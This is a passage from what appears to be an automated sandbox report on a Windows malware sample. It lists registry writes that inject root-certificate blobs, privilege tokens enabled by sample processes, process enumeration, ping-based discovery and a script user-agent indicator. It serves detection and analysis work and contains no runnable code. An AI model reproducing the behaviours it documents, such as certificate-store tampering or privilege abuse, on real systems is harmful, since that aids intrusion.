8d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Wed09d8d6edfaff2ac.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 1900000001000000100000002fe1f70bb05d7c92335bc5e05b984da6030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e81d000000010000001000000073b6876195f5d18e048510422aef04e314000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e090000000100000016000000301406082b0601050507030206082b060105050703010b000000010000001a0000004900530052004700200052006f006f007400200058003100000062000000010000002000000096bcec06264976f37460779acf28c5a7cfe8a3c0aae11a8ffcee05c0bddf08c60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f6320000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Wed09d8d6edfaff2ac.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da6030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e81d000000010000001000000073b6876195f5d18e048510422aef04e314000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e090000000100000016000000301406082b0601050507030206082b060105050703010b000000010000001a0000004900530052004700200052006f006f007400200058003100000062000000010000002000000096bcec06264976f37460779acf28c5a7cfe8a3c0aae11a8ffcee05c0bddf08c60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f630400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Wed09d8d6edfaff2ac.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	Wed09d8d6edfaff2ac.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 5c000000010000000400000000080000190000000100000010000000fd960962ac6938e0d4b0769aa1a64e260f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a040000000100000010000000324a4bbbc863699bbe749ac6dd1d46242000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	Wed09d8d6edfaff2ac.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e0f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f6362000000010000002000000096bcec06264976f37460779acf28c5a7cfe8a3c0aae11a8ffcee05c0bddf08c60b000000010000001a0000004900530052004700200052006f006f0074002000580031000000090000000100000016000000301406082b0601050507030206082b0601050507030114000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e1d000000010000001000000073b6876195f5d18e048510422aef04e3030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e81900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Wed09d8d6edfaff2ac.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5064 PING.EXE
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 259 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
5064	PING.EXE

description	flow	ioc
HTTP User-Agent header	259	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exe18.exeWed09d27135e5a8b3b.tmpWed09b2a8bc4f16cb.exeWed09d8d6edfaff2ac.exe

pid	process
1852	powershell.exe
1852	powershell.exe
1932	powershell.exe
1932	powershell.exe
1932	powershell.exe
1852	18.exe
1800	Wed09d27135e5a8b3b.tmp
1800	Wed09d27135e5a8b3b.tmp
2576	Wed09b2a8bc4f16cb.exe
2576	Wed09b2a8bc4f16cb.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe
4028	Wed09d8d6edfaff2ac.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1584 Explorer.EXE

pid	process
1584	Explorer.EXE

Suspicious behavior: MapViewOfSection 10 IoCs

Processes:

Wed09b2a8bc4f16cb.exeiDy7r92AdHoe594PiOA4dmf8.exe4xggSC5Dk2sgR5wUwIkMzBkH.exemstsc.exe39P_8p3e0thz0YWGHuCJsZ4x.exe

pid	process
2576	Wed09b2a8bc4f16cb.exe
5488	iDy7r92AdHoe594PiOA4dmf8.exe
5488	iDy7r92AdHoe594PiOA4dmf8.exe
5488	iDy7r92AdHoe594PiOA4dmf8.exe
5384	4xggSC5Dk2sgR5wUwIkMzBkH.exe
5384	4xggSC5Dk2sgR5wUwIkMzBkH.exe
5384	4xggSC5Dk2sgR5wUwIkMzBkH.exe
4628	mstsc.exe
4628	mstsc.exe
5952	39P_8p3e0thz0YWGHuCJsZ4x.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

WinHoster.exe

pid process

1488 WinHoster.exe

pid	process
1488	WinHoster.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Wed096a1bff61.exeWed09db0d52c38.exepowershell.exepowershell.exeWed09b3a5ca1a712d390.exeBCleanSoft82.exe4.exe5.exeWerFault.exe10.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	2008	Wed096a1bff61.exe
Token: SeCreateTokenPrivilege	3952	Wed09db0d52c38.exe
Token: SeAssignPrimaryTokenPrivilege	3952	Wed09db0d52c38.exe
Token: SeLockMemoryPrivilege	3952	Wed09db0d52c38.exe
Token: SeIncreaseQuotaPrivilege	3952	Wed09db0d52c38.exe
Token: SeMachineAccountPrivilege	3952	Wed09db0d52c38.exe
Token: SeTcbPrivilege	3952	Wed09db0d52c38.exe
Token: SeSecurityPrivilege	3952	Wed09db0d52c38.exe
Token: SeTakeOwnershipPrivilege	3952	Wed09db0d52c38.exe
Token: SeLoadDriverPrivilege	3952	Wed09db0d52c38.exe
Token: SeSystemProfilePrivilege	3952	Wed09db0d52c38.exe
Token: SeSystemtimePrivilege	3952	Wed09db0d52c38.exe
Token: SeProfSingleProcessPrivilege	3952	Wed09db0d52c38.exe
Token: SeIncBasePriorityPrivilege	3952	Wed09db0d52c38.exe
Token: SeCreatePagefilePrivilege	3952	Wed09db0d52c38.exe
Token: SeCreatePermanentPrivilege	3952	Wed09db0d52c38.exe
Token: SeBackupPrivilege	3952	Wed09db0d52c38.exe
Token: SeRestorePrivilege	3952	Wed09db0d52c38.exe
Token: SeShutdownPrivilege	3952	Wed09db0d52c38.exe
Token: SeDebugPrivilege	3952	Wed09db0d52c38.exe
Token: SeAuditPrivilege	3952	Wed09db0d52c38.exe
Token: SeSystemEnvironmentPrivilege	3952	Wed09db0d52c38.exe
Token: SeChangeNotifyPrivilege	3952	Wed09db0d52c38.exe
Token: SeRemoteShutdownPrivilege	3952	Wed09db0d52c38.exe
Token: SeUndockPrivilege	3952	Wed09db0d52c38.exe
Token: SeSyncAgentPrivilege	3952	Wed09db0d52c38.exe
Token: SeEnableDelegationPrivilege	3952	Wed09db0d52c38.exe
Token: SeManageVolumePrivilege	3952	Wed09db0d52c38.exe
Token: SeImpersonatePrivilege	3952	Wed09db0d52c38.exe
Token: SeCreateGlobalPrivilege	3952	Wed09db0d52c38.exe
Token: 31	3952	Wed09db0d52c38.exe
Token: 32	3952	Wed09db0d52c38.exe
Token: 33	3952	Wed09db0d52c38.exe
Token: 34	3952	Wed09db0d52c38.exe
Token: 35	3952	Wed09db0d52c38.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	2164	Wed09b3a5ca1a712d390.exe
Token: SeDebugPrivilege	4180	BCleanSoft82.exe
Token: SeDebugPrivilege	4508	4.exe
Token: SeDebugPrivilege	4604	5.exe
Token: SeRestorePrivilege	4948	WerFault.exe
Token: SeBackupPrivilege	4948	WerFault.exe
Token: SeDebugPrivilege	4248	10.exe
Token: SeShutdownPrivilege	1584	Explorer.EXE
Token: SeCreatePagefilePrivilege	1584	Explorer.EXE
Token: SeShutdownPrivilege	1584	Explorer.EXE
Token: SeCreatePagefilePrivilege	1584	Explorer.EXE
Token: SeShutdownPrivilege	1584	Explorer.EXE
Token: SeCreatePagefilePrivilege	1584	Explorer.EXE
Token: SeShutdownPrivilege	1584	Explorer.EXE
Token: SeCreatePagefilePrivilege	1584	Explorer.EXE
Token: SeShutdownPrivilege	1584	Explorer.EXE
Token: SeCreatePagefilePrivilege	1584	Explorer.EXE
Token: SeShutdownPrivilege	1584	Explorer.EXE
Token: SeCreatePagefilePrivilege	1584	Explorer.EXE
Token: SeShutdownPrivilege	1584	Explorer.EXE
Token: SeCreatePagefilePrivilege	1584	Explorer.EXE
Token: SeShutdownPrivilege	1584	Explorer.EXE
Token: SeCreatePagefilePrivilege	1584	Explorer.EXE
Token: SeShutdownPrivilege	1584	Explorer.EXE
Token: SeCreatePagefilePrivilege	1584	Explorer.EXE
Token: SeShutdownPrivilege	1584	Explorer.EXE
Token: SeCreatePagefilePrivilege	1584	Explorer.EXE

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

Wed09e95ff6b5.exeAltrove.exe.comWed09d27135e5a8b3b.tmpExplorer.EXErun2.exe

pid	process
2840	Wed09e95ff6b5.exe
2840	Wed09e95ff6b5.exe
2840	Altrove.exe.com
1800	Wed09d27135e5a8b3b.tmp
2840	Altrove.exe.com
2840	Altrove.exe.com
2840	Altrove.exe.com
2840	Altrove.exe.com
2840	Altrove.exe.com
2840	Altrove.exe.com
2840	Altrove.exe.com
1584	Explorer.EXE
1584	Explorer.EXE
1656	run2.exe
1584	Explorer.EXE
1584	Explorer.EXE
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1584	Explorer.EXE
1584	Explorer.EXE
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe

Suspicious use of SendNotifyMessage 60 IoCs

Processes:

Wed09e95ff6b5.exeAltrove.exe.comrun2.exeExplorer.EXE

pid	process
2840	Wed09e95ff6b5.exe
2840	Wed09e95ff6b5.exe
2840	Altrove.exe.com
2840	Altrove.exe.com
2840	Altrove.exe.com
2840	Altrove.exe.com
2840	Altrove.exe.com
2840	Altrove.exe.com
2840	Altrove.exe.com
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1584	Explorer.EXE
1584	Explorer.EXE
1656	run2.exe
1584	Explorer.EXE
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe
1656	run2.exe

